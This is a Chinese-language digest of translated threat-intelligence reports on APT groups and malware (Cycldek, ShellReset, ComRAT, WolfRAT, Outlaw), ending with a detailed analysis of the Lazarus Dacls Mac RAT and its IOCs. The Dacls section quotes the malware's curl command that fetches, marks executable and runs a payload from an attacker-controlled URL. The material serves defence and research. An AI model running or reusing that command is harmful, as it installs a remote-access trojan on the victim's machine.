卡巴斯基报告:针对 Cycldek 黑客组织知识鸿沟的相关信息

在调查关于Cycldek组织2018年后有关攻击活动时,发现对该组织的信息了解甚少。本文旨在弥合对该组织的知识鸿沟,了解其最新活动和操作方式。以下是关于该组织的相关信息: Cycldek(也称为Goblin Panda和Conimes)在过去两年中一直很活跃,对东南亚地区国家政府进行了针对性的攻击活动。 相关活动的分析显示了两种不同的模式,表明该组织是由一个领导管理的两个运营实体组成。 我们检测发现到了用于目标网络的横向移动和信息窃取的工具,其中包括自定义工具、未报告工具以及二进制文件。 最新公布的工具之一被命名为USBCulprit,其通过USB媒体来提取受害者的数据。这表明Cycldek可能正试图到达受害者环境中的气隙网络,或依靠物理存在达到同样的目的。   … 更多内容请至Seebug Paper阅读全文:https://paper.seebug.org/1230/     消息来源:securelist, 译者:dengdeng。 本文由 HackerNews.cc 翻译整理,封面来源于网络。 转载请注明“转自 HackerNews.cc ” 并附上原文链接

ShellReset RAT 利用基于恶意宏的 word 文档传播

之前我们说到:网络犯罪分子通常会将攻击点与热点相联系。近期,我们就发现有犯罪分子使用伦敦技术事件做诱饵来进行网络攻击。 2020年2月-5月,我们观察到在基于.space和.xyz域的新注册站点上托管了四个基于恶意宏的Microsoft Word文档。由于几个文档的最终有效负载的部署策略、技术和过程(TTP)十分类似,我们认为这是同一个攻击者的行为。 据了解,.NET有效负载的最终版以往从未被检测到过,它的代码段很小,而且与QuasarRAT相重叠,但此代码段在运行时并未使用。根据最终有效负载中的唯一字符串我们为把该RAT命名为ShellReset。由于被检测到的数量有限,我们认为这可能是是一种小范围的攻击活动,而攻击者在这个攻击过程中使用的主题也和今年在伦敦发生的热点事件有关,其中还包括5G Expo 和Futurebuild。 其中的感染链涉及一些有趣的技术,如在运行时使用受信任的Windows实用程序在终端上编译有效负载以绕过安全机制,还会从攻击者的服务器下载混淆后的源代码。本文我将对分发策略和攻击的技术进行详细分析。   … 更多内容请至Seebug Paper阅读全文:https://paper.seebug.org/1228/     消息来源:zscaler, 译者:dengdeng。 本文由 HackerNews.cc 翻译整理,封面来源于网络。 转载请注明“转自 HackerNews.cc ” 并附上原文链接

Himera 和 AbSent-Loader 利用 Covid19 主题传播恶意软件

我们在日常的网络监测中,对许多伪装的电子邮件进行了拦截。这些邮件利用正在发生的冠状病毒有关的FMLA(《家庭医疗休假法》)要求,使用Himera和Absent-Loader这两种网络犯罪工具对数据进行了处理。 加载程序是一种恶意代码,用于将其他恶意软件代码加载到受害者的计算机中并对数据进行窃取。攻击者们会把被盗取的信息进行售卖,来获得相应的报酬。 此恶意活动中的样本首先使用Word文档(该文档指的是可执行文件),然后再删除另一个可执行文件并进行重命名,借此来逃避检测。     … 更多内容请至Seebug Paper阅读全文:https://paper.seebug.org/1226/     消息来源:yoroi, 译者:dengdeng。 本文由 HackerNews.cc 翻译整理,封面来源于网络。 转载请注明“转自 HackerNews.cc ” 并附上原文链接

从 Agent.BTZ 到 ComRAT v4 的十年发展历程

ESET研究人员近期发现了由Turla组织ComRAT经营的恶意软件的更新版本。Turla,也被称为Snake,是一个臭名昭著的间谍组织,已经活跃了十多年,之前也介绍过许多该组织的活动。 ComRAT,也称为Agent.BTZ,是一种用于远程访问特洛伊木马(RAT),该木马在2008年因违反美国军方使用规则声名狼藉。该恶意软件的第一版(约在2007年发布)通过传播可移动驱动器来展现蠕虫功能。从2007年到2012年,已经发布了RAT的两个主要版本。有趣的是,它们都使用了著名的Turla XOR密钥: 1dM3uu4j7Fw4sjnbcwlDqet4F7JyuUi4m5Imnxl1pzxI6as80cbLnmz54cs5Ldn4ri3do5L6gs923HL34x2f5cvd0fk6c1a0s 2017年,Turla开发人员对ComRAT进行了一些更改,但这些变体仍然是从相同的代码库中派生出来的,相关研究报告请见https://www.welivesecurity.com/wp-content/uploads/2020/05/ESET_Turla_ComRAT.pdf。此外还发布了不同的ComRAT版本。这个新版本使用了全新的代码库,相比之前的版本会复杂很多。以下是该恶意软件的几个特征: ComRAT v4于2017年首次亮相,直到2020年1月仍在使用。 其至少确定了三个攻击目标:两个外交部和一个国民议会。 ComRAT用于窃取敏感文档,运营商使用OneDrive和4shared等云服务来窃取数据。 ComRAT是用C ++开发的复杂后门程序。 ComRAT使用FAT16格式化的虚拟FAT16文件系统。 其使用现有的访问方法(例如PowerStalli on PowerShell后门)部署ComRAT。 ComRAT具有两个命令和控制通道: 1.HTTP:它使用与ComRAT v3完全相同的协议; 2.电子邮件:它使用Gmail网络界面接收命令并窃取数据。 ComRAT可以在受到感染的计算机上执行如泄露其他程序或文件的操作。   …… 更多内容请至Seebug Paper阅读全文:https://paper.seebug.org/1222/     消息来源:welivesecurity, 译者:dengdeng。 本文由 HackerNews.cc 翻译整理,封面来源于网络。 转载请注明“转自 HackerNews.cc ” 并附上原文链接  

Sarwent 恶意软件更新命令功能持续发展

Sarwent很少受到研究人员的关注,但是该后门恶意软件仍在积极开发中,在持续更新命令并专注于RDP的研发。 Sarwent恶意软件的更新表明,人们对后门功能(例如执行PowerShell命令)的兴趣不断增强; 其更新还显示了使用RDP的偏好; Sarwent被发现至少使用一个与TrickBot运算符相同的二进制签名器。 自2018年以来,Sarwent的使用率在不断提高,但相关的研究报告却很少。 过去,Sarwent功能一直围绕着如何成为装载程序而展开,另外它的AV(防病毒)检查功能在持续更新。   …… 更多内容请至Seebug Paper阅读全文:https://paper.seebug.org/1216/     消息来源:sentinelone, 译者:dengdeng。 本文由 HackerNews.cc 翻译整理,封面来源于网络。 转载请注明“转自 HackerNews.cc ” 并附上原文链接    

Wolf 恶意软件再次发起攻击

泰国Android设备用户正受到“ WolfRAT”的DenDroid升级版的攻击,目前,它主要针对如WhatsApp,Facebook Messenger和Line等社交软件。该升级版主要由臭名昭著的Wolf Research进行操作。其操作水平相当业余,主要进行代码重叠,开源项目复制粘贴,类的实例化,不稳定的程序打包和不安全的面板操作。 相关背景 思科Talos根据DenDroid恶意软件系列的泄漏发现了一种新的Android恶意软件,由于该恶意软件(其命令和控制(C2)基础结构)与Wolf Research之间的结构重合以及字符串的引用,因此我们将其命名为“ WolfRAT”。目前该开发团队似乎已经关闭,但黑客们还是非常活跃。 我们发现了一些针对泰国用户及其设备的攻击活动,部分C2服务器就在泰国。它的面板中有着泰文的JavaScript注释、域名还有泰式食品的引用,通过这些策略,诱使用户对这些面板进行访问,其过程并不复杂。 运作过程 该恶意软件模仿一些合法服务进程,如Google服务,GooglePlay或Flash更新。其操作主要是对于网络上大量的公共资源进行复制粘贴。 造成的后果 在被丹麦的威胁情报公司CSIS Group公开谴责之后,Wolf Research被关闭但成立了一个名为LokD的新组织,该组织致力于Android设备的安全保护。但由于设备的共享以及面板名被遗忘,我们认为该组织的黑客依然活跃而且还在进行开恶意软件的深层开发。此外,在C2面板上我们还发现了Wolf Research与另一个名为Coralco Tech的塞浦路斯组织之间存在潜在联系,而这个组织还在进行技术拦截研究。   …… 更多内容请至Seebug Paper阅读全文:https://paper.seebug.org/1216/     消息来源:talosintelligence, 译者:dengdeng。 本文由 HackerNews.cc 翻译整理,封面来源于网络。 转载请注明“转自 HackerNews.cc ” 并附上原文链接

LOLSnif–另一个基于 Ursnif 的目标追踪活动

工具泄露是网络安全中非常有趣的事件。一方面泄露的工具在被熟知且进行分析后,会对原有的文件造成某种意义的破坏,另一方面其内容将会被传入到较低版本的工具当中。本文将会对Ursnif的新版本进行了详细分析。 由于恶意软件的存在,源代码泄露情况很普遍。2017年,代码“ Eternal Blue”(CVE-2017-0144)遭泄露并被黑客入侵,而早在2010年银行木马Zeus的泄露就已经形成了恶意软件新格局,该木马的源代码在泄露后,出现了与该银行木马相同的代码库。本文我将重点介绍源代码在2014年就被泄露的系列事件,这个系列被称为Ursnif(也称为Gozi2 / ISFB),Ursnif是成熟的银行木马,而关于该系列的研究也有很多。 本文中我对Ursnif的最新变体进行了分析,发现它利用LOLBins、组件对象模型(COM)接口等技术来检测Internet Explorer,借此绕过本地代理以及Windows Management Instrumentation(WMI)来与操作系统进行交互,达到代替本地Win32 API的效果,该操作很难被检测到。 …… 更多内容请至Seebug Paper阅读全文:https://paper.seebug.org/1213/   消息来源:telekom, 译者:dengdeng。 本文由 HackerNews.cc 翻译整理,封面来源于网络。 转载请注明“转自 HackerNews.cc ” 并附上原文链接

COMpfun 操作者利用基于 HTTP 状态的木马欺骗签证申请

2019年秋,相关网站发布了一篇文章,其主要讲述了一个名为Reducor的COMpfun后继文件是如何即时感染文件以破坏TLS流量的,目前该恶意软件的开发者们还在开发新的功能。同年11月下旬,相关搜索引擎发现了一个新的木马,其之前发现的代码高度相似,经过进一步的研究表明,它使用的是与COMPFun相同的代码库。 本次恶意活动幕后操纵者聚焦于外交实体上,其目标是在欧洲。他们将最初的释放器以伪造签证申请的形式进行传播。合法的应用程序及32位或64位的恶意软件被保存在加密释放器中,但恶意代码是如何传递到目标中的这点我们尚不清楚。     …… 更多内容请至Seebug Paper阅读全文:https://paper.seebug.org/1212/     消息来源:securelist, 译者:dengdeng。 本文由 HackerNews.cc 翻译整理,封面来源于网络。 转载请注明“转自 HackerNews.cc ” 并附上原文链接

针对欧洲组织的新的僵尸网络 Outlaw 再度来袭

在我们的日常监控中,我们拦截了一个试图渗透客户网络的Linux恶意软件,该恶意软件是著的“ Shellbot ”,被定义为“ Outlaw Hacking Group”的犯罪工具。 早在2018年,TrendMicro首次发现“Outlaw Hacking Group”,该犯罪团伙主攻汽车和金融业,而Outlaw僵尸网通过暴力登录以及SSH漏洞(利用Shellshock Flaw和Drupalgeddon2漏洞)来实现对目标系统(包括服务器和IoT设备)的远程访问。其中,TrendMicro首次发现的版本还包含一个DDoS脚本,botmaster可以使用该脚的原有设置在暗网上提供的DDoS for-hire服务。 该恶意软件植入程序的主要组件是“Shellbot”变体,它是一个Monero矿机,与一个基于perl的后门捆绑在一起,包括一个基于IRC的bot和一个SSH扫描器。Shellbot自2005年被熟知,近期其出现在网络安全领域,使用的是全新的IRC服务器和全新的Monero pools,攻击目标针对全球组织。   更多内容请至Seebug Paper阅读全文:https://paper.seebug.org/1204/   消息来源:YOROI, 译者:dengdeng。 本文由 HackerNews.cc 翻译整理,封面来源于网络。 转载请注明“转自 HackerNews.cc ” 并附上原文链接

通过 Trojanized 2FA 应用程序散播 Lazarus Dacls RAT 的 Mac 新变种木马

有关研究团队最新发现了一种新的Dacls远程访问特洛伊木马(RAT)变种,它与朝鲜的Lazarus集团有关联,并且专门为Mac操作系统设计。 Dacls是2019年12月奇虎360 NetLab发现的一种针对Windows和Linux平台的全功能隐蔽远程访问特洛伊木马(RAT)。 这个Mac变种至少通过一个名为MinaOTP的木马化的macOS二元身份验证应用程序进行分发,该应用程序主要由中国用户使用。与Linux变种类似,它拥有多种功能,包括命令执行、文件管理、流量代理和蠕虫扫描。 发现 4月8日,一个名为“TiNakOTP”的可疑Mac应用程序从香港提交到VirusTotal,当时没有任何引擎检测到它。 恶意的bot可执行文件位于应用程序的“Contents/Resources/Base.lproj/”目录中,当它是Mac可执行文件时,它会伪装成nib文件(“SubMenu.nib”)。它包含字符串“c_2910.cls”和“k_3872.cls”,而这是以前检测到的证书和私钥文件的名称。 持久性 该RAT通过LaunchDaemons或LaunchAgents持久存在,它们采用属性列表(plist)文件,这个文件指定了重启后需要执行的应用程序。LaunchAgents和LaunchDaemons之间的区别在于,LaunchAgents代表登录用户运行代码,而LaunchDaemons以root用户运行代码。“ 当恶意应用程序启动时,它将在“Library/LaunchDaemons”目录下创建一个名称为“com.aex-loop.agent.plist”的plist文件,plist文件的内容在应用程序中进行了硬编码。 该程序还会检查“getpwuid( getuid() )”是否返回当前进程的用户ID。如果返回用户ID,它将在LaunchAgents目录“Library/LaunchAgents/”下创建plist文件“com.aex-loop.agent.plist”。 图1 plist文件 存储plist的文件名和目录为十六进制格式并附加在一起,它们向后显示文件名和目录。 图2 目录和文件名生成 配置文件 配置文件包含有关受害者计算机的信息,例如Puid、Pwuid、插件和C&C服务器,配置文件的内容使用AES加密算法进行加密。 图3 加载配置 Mac和Linux变种都使用相同的AES密钥和IV来加密和解密配置文件,两种变种中的AES模式均为CBC。 图4 AES密钥和IV 配置文件的位置和名称以十六进制格式存储在代码中,该配置文件名称伪装成与Apple Store相关的数据库文件:“Library/Caches/Com.apple.appstore.db”。 图5 配置文件名 “IntializeConfiguration”功能使用以下硬编码的C&C服务器初始化配置文件。 图6 初始化配置文件 通过从C&C服务器接收命令来不断更新配置文件。安装后的应用程序名称为“mina”。Mina来自MinaOTP应用程序,它是针对macOS的双因素身份验证应用程序。 图7 配置文件正在更新 主循环 初始化配置文件后,执行主循环以执行以下四个主命令: 将C&C服务器信息从配置文件上载到服务器(0x601) 从服务器下载配置文件内容并更新配置文件(0x602) 通过调用“getbasicinfo”函数(0x700)从受害者的计算机上传收集的信息 发送heartbeat信息(0x900) 命令代码与Linux.dacls完全相同。 图8 主循环 插件 此Mac-RAT拥有Linux变种中的所有六个插件,以及一个名为“SOCKS”的附加插件。这个新插件用于代理从受害者到C&C服务器的网络流量。 该应用程序会在主循环开始时加载所有七个插件。每个插件在配置文件中都有自己的配置部分,将在插件初始化时加载。 图9 加载的插件 CMD插件 cmd插件类似于Linux rat中的“bash”插件,它通过为C&C服务器提供一个反向shell来接收和执行命令。 图10 CMD插件 文件插件 文件插件具有读取、删除、下载和搜索目录中文件的功能。Mac和Linux变种之间的唯一区别是Mac变种不具有写入文件的能力(case 0)。 图11 文件插件 进程插件 进程插件具有终止、运行、获取进程ID和收集进程信息的功能。 图12 进程插件 如果可以访问进程的“ / proc /%d / task”目录,则插件将从进程获取以下信息,其中%d是进程ID: 通过执行“/ proc /%/ cmdline”获取进程的命令行参数 “/ proc /%d / status”文件中进程的名称、Uid、Gid、PPid 测试插件 Mac和Linux变种之间的测试插件的代码是相同的,它检查到C&C服务器指定的IP和端口的连接。 RP2P插件 RP2P插件是一个代理服务器,用于避免受害者与参与者的基础设施进行直接通信。 图13 反向P2P LogSend插件 Logsend插件包含三个模块: 检查与日志服务器的连接 扫描网络(蠕虫扫描仪模块) 执行长期运行的系统命令 图14 Logsend插件 该插件使用HTTP端口请求发送收集的日志。 图15 用户代理 这个插件中一个有趣的功能是蠕虫扫描程序。“start_worm_scan”可以扫描端口8291或8292上的网络子网,要扫描的子网是基于一组预定义规则确定的。下图显示了选择要扫描的子网的过程。 图16 蠕虫扫描 Socks插件 Socks插件是此Mac Rat中新增的第七个插件,它类似于RP2P插件,并充当引导bot和C&C基础结构之间通信的媒介,它使用Socks4进行代理通信。 图17 Socks4 网络通讯 此Mac-RAT使用的C&C通信与Linux变种类似,为了连接到服务器,应用程序首先建立一个TLS连接,然后执行beaconing操作,最后使用RC4算法对通过SSL发送的数据进行加密。 图18 应用程序生成的流量(.mina) 图19 TLS连接 Mac和Linux变种都使用WolfSSL库进行SSL通信,WolfSSL通过C中的TLS的开源实现,支持多个平台。这个库已被多个威胁参与者使用,例如,Tropic Trooper在其Keyboys恶意软件中使用了这个库。 图20 WolfSSL 用于beaconing的命令代码与Linux.dacls中使用的代码相同,这是为了确认bot和服务器的身份。 图21 Beaconing RC4密钥是通过使用硬编码密钥生成的。 图22 RC4初始化 变体和检测 我们还确定了此RAT的另一个变体,该变体使用以下curl命令下载恶意负载:curl -k -o〜/ Library / .mina https://loneeaglerecords.com/wpcontent/uploads/2020/01/images.tgz.001>/ dev / null 2>&1 && chmod + x〜/ Library / .mina> /dev / null 2>&1 &&〜/ Library / .mina> / dev。 我们认为,Dcals RAT的Mac变体与Lazarus小组(也称为Hidden Cobra和APT 38)有关,Lazarus小组是自2009年以来一直从事网络间谍活动和网络犯罪的臭名昭著的朝鲜恐怖组织。 据悉,该组织是最成熟的参与者之一,能够针对不同平台定制恶意软件。这个Mac-RAT的发现表明,APT小组正在不断开发其恶意软件工具集。 Mac的Malwarebytes将该远程管理木马检测为OSX-DaclsRAT。 IOCs 899e66ede95686a06394f707dd09b7c29af68f95d22136f0a023bfd01390ad53 846d8647d27a0d729df40b13a644f3bffdc95f6d0e600f2195c85628d59f1dc6 216a83e54cac48a75b7e071d0262d98739c840fd8cd6d0b48a9c166b69acd57d d3235a29d254d0b73ff8b5445c962cd3b841f487469d60a02819c0eb347111dd d3235a29d254d0b73ff8b5445c962cd3b841f487469d60a02819c0eb347111dd   loneeaglerecords[.]com/wp-content/uploads/2020/01/images.tgz.001 67.43.239.146 185.62.58.207 50.87.144.227   消息来源:malwarebytes, 译者:dengdeng。 本文由 HackerNews.cc 翻译整理,封面来源于网络。 转载请注明“转自 HackerNews.cc ” 并附上原文链接